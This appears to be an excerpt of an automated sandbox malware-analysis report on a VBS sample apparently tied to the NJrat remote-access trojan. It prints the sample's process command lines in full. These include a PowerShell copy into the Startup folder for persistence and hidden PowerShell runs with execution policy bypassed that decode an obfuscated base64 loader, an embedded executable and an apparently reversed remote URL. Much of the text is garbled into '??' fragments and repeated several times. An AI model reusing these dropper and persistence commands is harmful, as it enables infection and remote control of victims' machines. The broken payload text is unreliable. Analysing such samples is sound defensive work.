?? ?? ?? H?? ?? ?? ?? ?? I?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C?? ?? ?? G?? ucnNyYw?? ?? ?? JgD?? ?? ?? ?? Q?? ?? ?? ?? ?? Q?? ?? ?? ?? e?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? B?? ?? ?? B?? LnJlbG9j?? ?? ?? M?? ?? ?? ?? ?? G?? ?? ?? ?? ?? C?? ?? ?? ?? Ig?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? Qg?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? DhOQ?? ?? ?? ?? ?? ?? ?? Eg?? ?? ?? ?? C?? ?? U?? nCI?? ?? LgV?? ?? ?? D?? ?? ?? ?? ?? ?? ?? ?? ?? FQ4?? ?? C4?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\user\Desktop\NJratccccassssG2.00.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ VFM.vbs') Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J?BM?Eg?ZwBL?C??PQ?g?Cc?JQBN?Ek?UwBx?Eg?RwBL?Fo?TQBB?CU?Jw?7?Fs?QgB5?HQ?ZQBb?F0?XQ?g?CQ?ZgB1?FU?Tg?g?D0?I?Bb?FM?eQBz?HQ?ZQBt?C4?QwBv?G4?dgBl?HI?d?Bd?Do?OgBG?HI?bwBt?EI?YQBz?GU?Ng?0?FM?d?By?Gk?bgBn?Cg?I??k?Ew?S?Bn?Es?LgBy?GU?c?Bs?GE?YwBl?Cg?JwDmEEIgrC?n?Cw?JwBB?Cc?KQ?g?Ck?OwBb?FM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Do?QwB1?HI?cgBl?G4?d?BE?G8?bQBh?Gk?bg?u?Ew?bwBh?GQ?K??k?GY?dQBV?E4?KQ?u?Ec?ZQB0?FQ?eQBw?GU?K??n?Gw?c?BP?FU?c?Bs?E0?c??u?FU?RwBs?Hk?bQB6?FU?Zw?n?Ck?LgBH?GU?d?BN?GU?d?Bo?G8?Z??o?Cc?VQBE?HM?UwBp?EQ?YgBi?Cc?KQ?u?Ek?bgB2?G8?awBl?Cg?J?Bu?HU?b?Bs?Cw?I?Bb?G8?YgBq?GU?YwB0?Fs?XQBd?C??K??n?HQ?e?B0?C4?YQBz?GE?YwBX?EU?TgB0?GE?cgBK?E4?M??y?CU?N??2?D??Mg?l?GU?cwBh?GI?LwBh?HM?YQBj?D??Mg?l?Fc?RQBO?HQ?YQBy?Eo?Tg?v?G0?bwBj?C4?bwB1?GU?dQ?u?Hc?ZQBu?GE?cwBh?GM?d?Bh?HI?agBu?C8?Lw?6?H??d?B0?Gg?Jw?p?Ck?';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $Codigo.replace('?','A') ) ).replace('%MISqHGKZMA%','TVqQ?? ?? M?? ?? ?? ?? E?? ?? ?? ?? //8?? ?? Lg?? ?? ?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? g?? ?? ?? ?? ?? 4fug4?? t?? nNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJ?? ?? ?? ?? ?? ?? ?? ?? ?? BQRQ?? ?? T?? ED?? OJNIpY?? ?? ?? ?? ?? ?? ?? ?? ?? ?? O?? ?? ?? iEL?? V?? ?? ?? Bw?? ?? ?? ?? G?? ?? ?? ?? ?? ?? ?? ?? ?? jo?? ?? ?? ?? g?? ?? ?? ?? Q?? ?? ?? ?? ?? ?? ?? E?? ?? g?? ?? ?? ?? ?? g?? ?? B?? ?? ?? ?? ?? ?? ?? ?? ?? ?? G?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C?? ?? ?? ?? ?? ?? g?? ?? ?? ?? ?? ?? ?? ?? M?? YIU?? ?? B?? ?? ?? B?? ?? ?? ?? ?? ?? E?? ?? ?? E?? ?? ?? ?? ?? ?? ?? ?? B?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? K05?? ?? BP?? ?? ?? ?? ?? E?? ?? ?? JgD?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? G?? ?? ?? ?? w?? ?? ?? ?? MOQ?? ?? O?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? I?? ?? ?? C?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? CC?? ?? ?? Eg?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C50ZXh0?? ?? ?? ?? CBo?? ?? ?? ?? g?? ?? ?? ?? H?? ?? ?? ?? ?? I?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C?? ?? ?? G?? ucnNyYw?? ?? ?? JgD?? ?? ?? ?? Q?? ?? ?? ?? ?? Q?? ?? ?? ?? e?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? B?? ?? ?? B?? LnJlbG9j?? ?? ?? M?? ?? ?? ?? ?? G?? ?? ?? ?? ?? C?? ?? ?? ?? Ig?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? Qg?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? DhOQ?? ?? ?? ?? ?? ?? ?? Eg?? ?? ?? ?? C?? ?? U?? nCI?? ?? LgV?? ?? ?? D?? ?? ?? ?? ?? ?? ?? ?? ?? FQ4?? ?? C4?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ? Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "$LHgK = 'TVqQ?? ?? M?? ?? ?? ?? E?? ?? ?? ?? //8?? ?? Lg?? ?? ?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? g?? ?? ?? ?? ?? 4fug4?? t?? nNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJ?? ?? ?? ?? ?? ?? ?? ?? ?? BQRQ?? ?? T?? ED?? OJNIpY?? ?? ?? ?? ?? ?? ?? ?? ?? ?? O?? ?? ?? iEL?? V?? ?? ?? Bw?? ?? ?? ?? G?? ?? ?? ?? ?? ?? ?? ?? ?? jo?? ?? ?? ?? g?? ?? ?? ?? Q?? ?? ?? ?? ?? ?? ?? E?? ?? g?? ?? ?? ?? ?? g?? ?? B?? ?? ?? ?? ?? ?? ?? ?? ?? ?? G?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C?? ?? ?? ?? ?? ?? g?? ?? ?? ?? ?? ?? ?? ?? M?? YIU?? ?? B?? ?? ?? B?? ?? ?? ?? ?? ?? E?? ?? ?? E?? ?? ?? ?? ?? ?? ?? ?? B?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? K05?? ?? BP?? ?? ?? ?? ?? E?? ?? ?? JgD?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? G?? ?? ?? ?? w?? ?? ?? ?? MOQ?? ?? O?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? I?? ?? ?? C?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? CC?? ?? ?? Eg?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C50ZXh0?? ?? ?? ?? CBo?? ?? ?? ?? g?? ?? ?? ?? H?? ?? ?? ?? ?? I?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C?? ?? ?? G?? ucnNyYw?? ?? ?? JgD?? ?? ?? ?? Q?? ?? ?? ?? ?? Q?? ?? ?? ?? e?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? B?? ?? ?? B?? LnJlbG9j?? ?? ?? M?? ?? ?? ?? ?? G?? ?? ?? ?? ?? C?? ?? ?? ?? Ig?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? Qg?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? DhOQ?? ?? ?? ?? ?? ?? ?? Eg?? ?? ?? ?? C?? ?? U?? nCI?? ?? LgV?? ?? ?? D?? ?? ?? ?? ?? ?? ?? ?? ?? FQ4?? ?? C4?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? B4CKBc?? ?? ?? oqHgIoG?? ?? ?? Ciqmcxk?? ?? ?? q?? ?? Q?? ?? BHMa?? ?? ?? Kg?? I?? ?? ?? RzGw?? ?? Co?? D?? ?? ?? Ecxw?? ?? ?? q?? B?? ?? ?? BCoufgE?? ?? ?? RvHQ?? ?? CioufgI?? ?? ?? RvHg?? ?? CioufgM?? ?? ?? RvHw?? ?? CioufgQ?? ?? ?? RvI?? ?? ?? CirGfgU?? ?? ?? QUKCE?? ?? ?? osHnIB?? ?? Bw0?? U?? ?? ?? IoIg?? ?? Cm8j?? ?? ?? KcyQ?? ?? ?? q?? BQ?? ?? BH4F?? ?? ?? EKhp+Bg?? ?? BCoe?? o?? G?? ?? ?? EKlZzD?? ?? ?? Bigl?? ?? ?? Kd?? Y?? ?? ?? K?? Bw?? ?? BCoe?? igm?? ?? ?? KKhp+Bw?? ?? BCoaK?? 0?? ?? ?? YqHgIoJw?? ?? Cio?? Ez?? H?? Lc?? ?? ?? ?? B?? ?? ?? Rcic?? ?? H?? Kcyg?? ?? ?? olKCk?? ?? ?? pvKg?? ?? CgYoKw?? ?? Cm8s?? ?? ?? KCwcoKw?? ?? CgsHcn8?? ?? HByhQ?? ?? cG8t?? ?? ?? KC3Mo?? ?? ?? K?? igr?? ?? ?? KKCw?? ?? ?? oMCCgr?? ?? ?? KDHKJ?? ?? BwKCs?? ?? ?? oNCXLP?? ?? BwKCs?? ?? ?? ooLg?? ?? Cg0oLw?? ?? CgcoM?? ?? ?? Cm8x?? ?? ?? Kcuc?? ?? HBvMg?? ?? CnIL?? Q Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ VFM.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ VFM.vbs') Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J?BM?Eg?ZwBL?C??PQ?g?Cc?JQBN?Ek?UwBx?Eg?RwBL?Fo?TQBB?CU?Jw?7?Fs?QgB5?HQ?ZQBb?F0?XQ?g?CQ?ZgB1?FU?Tg?g?D0?I?Bb?FM?eQBz?HQ?ZQBt?C4?QwBv?G4?dgBl?HI?d?Bd?Do?OgBG?HI?bwBt?EI?YQBz?GU?Ng?0?FM?d?By?Gk?bgBn?Cg?I??k?Ew?S?Bn?Es?LgBy?GU?c?Bs?GE?YwBl?Cg?JwDmEEIgrC?n?Cw?JwBB?Cc?KQ?g?Ck?OwBb?FM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Do?QwB1?HI?cgBl?G4?d?BE?G8?bQBh?Gk?bg?u?Ew?bwBh?GQ?K??k?GY?dQBV?E4?KQ?u?Ec?ZQB0?FQ?eQBw?GU?K??n?Gw?c?BP?FU?c?Bs?E0?c??u?FU?RwBs?Hk?bQB6?FU?Zw?n?Ck?LgBH?GU?d?BN?GU?d?Bo?G8?Z??o?Cc?VQBE?HM?UwBp?EQ?YgBi?Cc?KQ?u?Ek?bgB2?G8?awBl?Cg?J?Bu?HU?b?Bs?Cw?I?Bb?G8?YgBq?GU?YwB0?Fs?XQBd?C??K??n?HQ?e?B0?C4?YQBz?GE?YwBX?EU?TgB0?GE?cgBK?E4?M??y?CU?N??2?D??Mg?l?GU?cwBh?GI?LwBh?HM?YQBj?D??Mg?l?Fc?RQBO?HQ?YQBy?Eo?Tg?v?G0?bwBj?C4?bwB1?GU?dQ?u?Hc?ZQBu?GE?cwBh?GM?d?Bh?HI?agBu?C8?Lw?6?H??d?B0?Gg?Jw?p?Ck?';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $Codigo.replace('?','A') ) ).replace('%MISqHGKZMA%','TVqQ?? ?? M?? ?? ?? ?? E?? ?? ?? ?? //8?? ?? Lg?? ?? ?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? g?? ?? ?? ?? ?? 4fug4?? t?? nNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJ?? ?? ?? ?? ?? ?? ?? ?? ?? BQRQ?? ?? T?? ED?? OJNIpY?? ?? ?? ?? ?? ?? ?? ?? ?? ?? O?? ?? ?? iEL?? V?? ?? ?? Bw?? ?? ?? ?? G?? ?? ?? ?? ?? ?? ?? ?? ?? jo?? ?? ?? ?? g?? ?? ?? ?? Q?? ?? ?? ?? ?? ?? ?? E?? ?? g?? ?? ?? ?? ?? g?? ?? B?? ?? ?? ?? ?? ?? ?? ?? ?? ?? G?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C?? ?? ?? ?? ?? ?? g?? ?? ?? ?? ?? ?? ?? ?? M?? YIU?? ?? B?? ?? ?? B?? ?? ?? ?? ?? ?? E?? ?? ?? E?? ?? ?? ?? ?? ?? ?? ?? B?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? K05?? ?? BP?? ?? ?? ?? ?? E?? ?? ?? JgD?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? G?? ?? ?? ?? w?? ?? ?? ?? MOQ?? ?? O?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? I?? ?? ?? C?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? CC?? ?? ?? Eg?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C50ZXh0?? ?? ?? ?? CBo?? ?? ?? ?? g?? ?? ?? ?? H?? ?? ?? ?? ?? I?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C?? ?? ?? G?? ucnNyYw?? ?? ?? JgD?? ?? ?? ?? Q?? ?? ?? ?? ?? Q?? ?? ?? ?? e?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? B?? ?? ?? B?? LnJlbG9j?? ?? ?? M?? ?? ?? ?? ?? G?? ?? ?? ?? ?? C?? ?? ?? ?? Ig?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? Qg?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? DhOQ?? ?? ?? ?? ?? ?? ?? Eg?? ?? ?? ?? C?? ?? U?? nCI?? ?? LgV?? ?? ?? D?? ?? ?? ?? ?? ?? ?? ?? ?? FQ4?? ?? C4?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ? Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\user\Desktop\NJratccccassssG2.00.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ VFM.vbs') Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J?BM?Eg?ZwBL?C??PQ?g?Cc?JQBN?Ek?UwBx?Eg?RwBL?Fo?TQBB?CU?Jw?7?Fs?QgB5?HQ?ZQBb?F0?XQ?g?CQ?ZgB1?FU?Tg?g?D0?I?Bb?FM?eQBz?HQ?ZQBt?C4?QwBv?G4?dgBl?HI?d?Bd?Do?OgBG?HI?bwBt?EI?YQBz?GU?Ng?0?FM?d?By?Gk?bgBn?Cg?I??k?Ew?S?Bn?Es?LgBy?GU?c?Bs?GE?YwBl?Cg?JwDmEEIgrC?n?Cw?JwBB?Cc?KQ?g?Ck?OwBb?FM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Do?QwB1?HI?cgBl?G4?d?BE?G8?bQBh?Gk?bg?u?Ew?bwBh?GQ?K??k?GY?dQBV?E4?KQ?u?Ec?ZQB0?FQ?eQBw?GU?K??n?Gw?c?BP?FU?c?Bs?E0?c??u?FU?RwBs?Hk?bQB6?FU?Zw?n?Ck?LgBH?GU?d?BN?GU?d?Bo?G8?Z??o?Cc?VQBE?HM?UwBp?EQ?YgBi?Cc?KQ?u?Ek?bgB2?G8?awBl?Cg?J?Bu?HU?b?Bs?Cw?I?Bb?G8?YgBq?GU?YwB0?Fs?XQBd?C??K??n?HQ?e?B0?C4?YQBz?GE?YwBX?EU?TgB0?GE?cgBK?E4?M??y?CU?N??2?D??Mg?l?GU?cwBh?GI?LwBh?HM?YQBj?D??Mg?l?Fc?RQBO?HQ?YQBy?Eo?Tg?v?G0?bwBj?C4?bwB1?GU?dQ?u?Hc?ZQBu?GE?cwBh?GM?d?Bh?HI?agBu?C8?Lw?6?H??d?B0?Gg?Jw?p?Ck?';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $Codigo.replace('?','A') ) ).replace('%MISqHGKZMA%','TVqQ?? ?? M?? ?? ?? ?? E?? ?? ?? ?? //8?? ?? Lg?? ?? ?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? g?? ?? ?? ?? ?? 4fug4?? t?? nNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJ?? ?? ?? ?? ?? ?? ?? ?? ?? BQRQ?? ?? T?? ED?? OJNIpY?? ?? ?? ?? ?? ?? ?? ?? ?? ?? O?? ?? ?? iEL?? V?? ?? ?? Bw?? ?? ?? ?? G?? ?? ?? ?? ?? ?? ?? ?? ?? jo?? ?? ?? ?? g?? ?? ?? ?? Q?? ?? ?? ?? ?? ?? ?? E?? ?? g?? ?? ?? ?? ?? g?? ?? B?? ?? ?? ?? ?? ?? ?? ?? ?? ?? G?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C?? ?? ?? ?? ?? ?? g?? ?? ?? ?? ?? ?? ?? ?? M?? YIU?? ?? B?? ?? ?? B?? ?? ?? ?? ?? ?? E?? ?? ?? E?? ?? ?? ?? ?? ?? ?? ?? B?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? K05?? ?? BP?? ?? ?? ?? ?? E?? ?? ?? JgD?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? G?? ?? ?? ?? w?? ?? ?? ?? MOQ?? ?? O?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? I?? ?? ?? C?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? CC?? ?? ?? Eg?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C50ZXh0?? ?? ?? ?? CBo?? ?? ?? ?? g?? ?? ?? ?? H?? ?? ?? ?? ?? I?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C?? ?? ?? G?? ucnNyYw?? ?? ?? JgD?? ?? ?? ?? Q?? ?? ?? ?? ?? Q?? ?? ?? ?? e?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? B?? ?? ?? B?? LnJlbG9j?? ?? ?? M?? ?? ?? ?? ?? G?? ?? ?? ?? ?? C?? ?? ?? ?? Ig?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? Qg?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? DhOQ?? ?? ?? ?? ?? ?? ?? Eg?? ?? ?? ?? C?? ?? U?? nCI?? ?? LgV?? ?? ?? D?? ?? ?? ?? ?? ?? ?? ?? ?? FQ4?? ?? C4?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ? Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Users\user\Desktop\NJratccccassssG2.00.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ VFM.vbs') Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "$LHgK = 'TVqQ?? ?? M?? ?? ?? ?? E?? ?? ?? ?? //8?? ?? Lg?? ?? ?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? g?? ?? ?? ?? ?? 4fug4?? t?? nNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJ?? ?? ?? ?? ?? ?? ?? ?? ?? BQRQ?? ?? T?? ED?? OJNIpY?? ?? ?? ?? ?? ?? ?? ?? ?? ?? O?? ?? ?? iEL?? V?? ?? ?? Bw?? ?? ?? ?? G?? ?? ?? ?? ?? ?? ?? ?? ?? jo?? ?? ?? ?? g?? ?? ?? ?? Q?? ?? ?? ?? ?? ?? ?? E?? ?? g?? ?? ?? ?? ?? g?? ?? B?? ?? ?? ?? ?? ?? ?? ?? ?? ?? G?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C?? ?? ?? ?? ?? ?? g?? ?? ?? ?? ?? ?? ?? ?? M?? YIU?? ?? B?? ?? ?? B?? ?? ?? ?? ?? ?? E?? ?? ?? E?? ?? ?? ?? ?? ?? ?? ?? B?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? K05?? ?? BP?? ?? ?? ?? ?? E?? ?? ?? JgD?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? G?? ?? ?? ?? w?? ?? ?? ?? MOQ?? ?? O?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? I?? ?? ?? C?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? CC?? ?? ?? Eg?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C50ZXh0?? ?? ?? ?? CBo?? ?? ?? ?? g?? ?? ?? ?? H?? ?? ?? ?? ?? I?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C?? ?? ?? G?? ucnNyYw?? ?? ?? JgD?? ?? ?? ?? Q?? ?? ?? ?? ?? Q?? ?? ?? ?? e?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? B?? ?? ?? B?? LnJlbG9j?? ?? ?? M?? ?? ?? ?? ?? G?? ?? ?? ?? ?? C?? ?? ?? ?? Ig?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? Qg?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? DhOQ?? ?? ?? ?? ?? ?? ?? Eg?? ?? ?? ?? C?? ?? U?? nCI?? ?? LgV?? ?? ?? D?? ?? ?? ?? ?? ?? ?? ?? ?? FQ4?? ?? C4?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 